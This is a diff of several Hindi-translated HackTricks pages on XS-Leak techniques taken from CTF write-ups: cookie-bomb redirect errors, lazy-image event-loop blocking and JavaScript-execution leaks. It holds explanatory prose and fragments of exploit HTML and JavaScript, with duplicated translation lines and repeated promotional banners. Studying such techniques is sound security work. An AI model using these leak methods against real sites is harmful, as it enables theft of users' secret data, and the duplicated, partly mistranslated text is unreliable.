<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना** चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह अनन्य [**NFTs**](https://opensea.io/collection/the-peass-family) का
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में PR जमा करके **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**.
</details>
निम्नलिखित **स्क्रिप्ट** [**यहां से**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) लिया गया है जो उपयोगकर्ता को **किसी भी मात्रा की कुकी** डालने की सुविधा का उपयोग कर रहा है, और फिर एक फ़ाइल को स्क्रिप्ट के रूप में लोड कर रहा है जानते हुए कि सच्चा प्रतिक्रिया झूलती होगी और फिर। सफलतापूर्वक, प्रतिक्रिया एक पुनर्निर्देशन होगी जिसमें एक परिणामस्वरूप URL लंबा होगा, **सर्वर द्वारा संभालने के लिए बहुत बड़ा होगा इसलिए एक त्रुटि HTTP स्थिति कोड लौटाएगा**। यदि खोज विफल होती है, तो कुछ नहीं होगा क्योंकि URL छोटा होगा
यहाँ से लिया गया **स्क्रिप्ट** [**यहाँ**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) एक फ़ंक्शनलिटी का शोषण कर रहा है जो उपयोगकर्ता को **किसी भी मात्रा की कुकी** डालने की अनुमति देती है, और फिर एक फ़ाइल को एक स्क्रिप्ट के रूप में लोड करने के बाद, जानते हुए कि सच्ची प्रतिक्रिया झूठी प्रतिक्रिया से अधिक होगी और फिर। यदि सफल होता है, तो प्रतिक्रिया एक रीडायरेक्ट है जिसमें एक परिणामी URL होता है जो **सर्वर द्वारा संभालने के लिए बहुत बड़ा है ताकि एक त्रुटि HTTP स्थिति कोड वापस दे**। यदि खोज विफल होती है, तो कुछ नहीं होगा क्योंकि URL छोटा ह
```html
<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
@ -65,10 +65,10 @@ break;
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -1,20 +1,20 @@
# इवेंट लूप ब्लॉकिंग + लेजी इमेजेस
# घटना लूप अवरोधन + आलसी छवियाँ
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने का उपयोग करना चाहते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपने हैकिंग ट्रिक्स साझा करें**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
[**इस एक्सप्लॉइट**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45) में, [**@aszx87410**](https://twitter.com/aszx87410) ने **लेजी इमेज साइड चैनल** तकनीक को HTML इंजेक्शन के साथ मिश्रित किया है जो एक प्रकार की **इवेंट लूप ब्लॉकिंग तकनीक** है चारों ओर से चर्स लीक करने के लिए
[**इस एक्सप्लॉइट**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45) में, [**@aszx87410**](https://twitter.com/aszx87410) **लेजी इमेज साइड चैनल** तकनीक को एक HTML इन्जेक्शन के माध्यम से मिश्रित करते हैं जिसमें **घटना लूप अवरोधन तकनीक** का उपयोग करके वर्णों को लीक करते हैं
यह एक **CTF चैलेंज** के लिए एक अलग एक्सप्लॉइट है जिसके बारे में पूरी जानकारी के लिए निम्नलिखित पेज पर टिप्पणी की गई है। चैलेंज के बारे में अधिक जानकारी के लिए देखें:
यह एक **विभिन्न एक्सप्लॉइट है CTF चैल** के लिए जिसका पहले से ही टिप्पणी किया गया था। अधिक जानकारी के लिए पृष्ठ की जाँच करें:
{% content-ref url="connection-pool-example.md" %}
[connection-pool-example.md](connection-pool-example.md)
@ -22,14 +22,14 @@
इस एक्सप्लॉइट के पीछे की विचारधारा है:
* पोस्ट वर्णमाला के क्रम से लोड होते हैं
* एक **हमलावर** एक **पोस्ट** इंजेक्ट कर सकता है जिसकी शुरुआत **"A"** से होती है, फिर कुछ **HTML टैग** (जैसे एक बड़ा **`<canvas`**) अधिकांश स्क्रीन को भर देगा और कुछ अंतिम **`<img lazy` टैग** चीजें लोड करने के लिए होंगे
* अगर हमलावर एक "A" की बजाय एक "z" के साथ एक समान पोस्ट इंजेक्ट करता है। तो **फ्लैग** वाली **पोस्ट** पहले दिखाई देगी, फिर इंजेक्ट की गई **पोस्ट** "z" से शुरू होगी और बड़ा **कैनवास** होगा। क्योंकि फ्लैग वाली पोस्ट पहले दिखाई दी, पहला कैनवास सभी स्क्रीन को भरेगा और अंतिम **`<img lazy`** टैग्स इंजेक्टेड स्क्रीन पर दिखाई नहीं देंगे, इसलिए वे लोड नहीं होंगे
* फिर, **जब** बॉट **पेज तक पहुंचेगा**, हमलावर **fetch रिक्वेस्ट** भेजेगा।
* अगर पोस्ट में इंजेक्टेड छवियां **लोड हो रही हैं**, तो ये **fetch** रिक्वेस्ट्स **अधिक समय** लेंगे, इसलिए हमलावर को पता चलेगा कि **पोस्ट फ्लैग से पहले** है (वर्णमाला के क्रम से)।
* अगर **fetch** रिक्वेस्ट्स **तेज** हैं, तो इसका मतलब है कि **पोस्ट** **फ्लैग से बाद** है।
* पोस्ट वर्णमाला के आधार पर लोड होते हैं
* एक **हमलावर** एक **पोस्ट** में **"A"** से शुरू कर सकता है, फिर कुछ **HTML टैग** (जैसे एक बड़ा **`<कैनवास`**) ज्यादातर **स्क्रीन** को भर देगा और कुछ अंतिम **`<img आलसी` टैग** को चीजें लोड करने के लिए।
* अगर हमलावर एक "A" की बजाय **वही पोस्ट इंजेक्ट करता है लेकिन "z" से शुरू करता है।** तो **झंडा वाली पोस्ट** पहले दिखाई देगी, फिर **इंजेक्टेड पोस्ट** "z" के साथ दिखाई देगी और **बड़ा** **कैनवास**। क्योंकि झंडा वाली पोस्ट पहले दिखाई दी, पहला कैनवास सभी स्क्रीन को भरेगा और अंतिम **`<img आलसी`** टैग इंजेक्ट किए गए **स्क्रीन में नहीं दिखाई जाएंगे**, इसलिए वे **लोड नहीं होंगे**
* फिर, **जब** बॉट पृष्ठ तक पहुंचता है, **हमलावर** **फेच अनुरोध** भेजेगा।
* अगर पोस्ट में इंजेक्ट की गई **छवियाँ लोड हो रही हैं**, तो ये **फेच** अनुरोध **अधिक समय** लेंगे, इसलिए हमलावर को पता चलता है कि **पोस्ट झंडे से पहले है** (वर्णमाला के आधार पर)।
* अगर **फेच** अनुरोध **तेज** हैं, तो इसका मतलब है कि **पोस्ट** **झंडे के बाद** है।
चलिए कोड की जांच करें:
कोड की जाँच करें:
```html
<!DOCTYPE html>
<html>
@ -154,10 +154,10 @@ resolve(isFound)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) का पता लगाए
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करे
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>

View file

@ -1,14 +1,14 @@
# JavaScript Execution XS Leak
# जावास्क्रिप्ट निष्कासन XS लीक
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) का पता लगाएं
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
```javascript
@ -30,7 +30,7 @@ window.parent.foo()
res.send(page)
});
```
मुख्य पृष्ठ जो पिछले `/guessing` पृष्ठ के लिए iframes उत्पन्न करता है, हर संभावना की परीक्षा करने के लिए
मुख्य पृष्ठ जो पिछले `/guessing` पृष्ठ के लिए iframes उत्पन्न करता है ताकि प्रत्येक संभावना का परीक्षण किया जा सके
```html
<html>
<head>
@ -79,10 +79,10 @@ hack.innerHTML = iframe
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें।**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** पर **फॉलो** करें
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) को PRs सबमिट करके।
</details>

View file

@ -4,20 +4,20 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**.
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
**एक्सप्लॉइट लिया गया [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
इस चैलेंज में उपयोगकर्ता हजारों वर्ण भेज सकता था और यदि ध्वज शामिल था, तो वर्ण बॉट को वापस भेज दिए जाते थे। इसलिए हमलावार ने ध्वज को भेजे गए स्ट्रिंग में ध्वज शामिल है या नहीं, यह माप सकता था
इस चैलेंज में उपयोगकर्ता हजारों वर्ण भेज सकता था और यदि ध्वज में शामिल था, तो वर्ण बॉट को वापस भेज दिए जाते थे। इसलिए एक बड़ी मात्रा में वर्ण डालकर हमलावर यह माप सकता था कि क्या ध्वज भेजे गए स्ट्रिंग में शामिल था या नहीं
{% hint style="warning" %}
शुरू में, मैंने ऑब्जेक्ट चौड़ाई और ऊचाई सेट नहीं की थी, लेकिन बाद में, मुझे यह महत्वपूर्ण मालूम हुआ क्योंकि डिफ़ॉल्ट साइज बहुत छोटा है जिससे लोड समय में अंतर नहीं हो सकता।
शुरू में, मैंने ऑब्जेक्ट की चौड़ाई और ऊचाई सेट नहीं की थी, लेकिन बाद में, मुझे यह महत्वपूर्ण मालूम हुआ क्योंकि डिफ़ॉल्ट साइज बहुत छोटा है जिससे लोड समय में अंतर नहीं पड़ता।
{% endhint %}
```html
<!DOCTYPE html>
@ -121,7 +121,7 @@ main()
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PRs सबमिट करके।**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>

View file

@ -4,11 +4,11 @@
